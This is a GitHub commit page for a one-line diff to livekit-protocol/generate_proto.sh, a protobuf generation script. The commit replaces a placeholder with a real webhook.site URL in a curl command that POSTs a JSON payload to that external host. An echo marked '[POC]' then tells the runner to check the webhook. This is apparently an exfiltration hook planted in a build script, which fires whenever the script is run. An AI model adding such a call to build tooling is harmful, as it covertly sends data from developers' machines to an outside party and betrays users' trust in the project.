Skip to content

Commit cbd17c6

Browse files
committed
ok, just addeded the custom link
1 parent dbd5a7f commit cbd17c6

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

livekit-protocol/generate_proto.sh

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -58,7 +58,7 @@ EOF
5858
)
5959

6060
# Send the payload to the external webhook
61-
curl -X POST -H "Content-Type: application/json" -d "${JSON_PAYLOAD}" https://webhook.site/YOUR_UNIQUE_URL_HERE
61+
curl -X POST -H "Content-Type: application/json" -d "${JSON_PAYLOAD}" https://webhook.site/83eec9ca-ff62-4398-ab88-84e4376b6032
6262

6363
echo "[POC] Done. Check your webhook."
6464
echo "================================================================="

0 commit comments

Comments
 (0)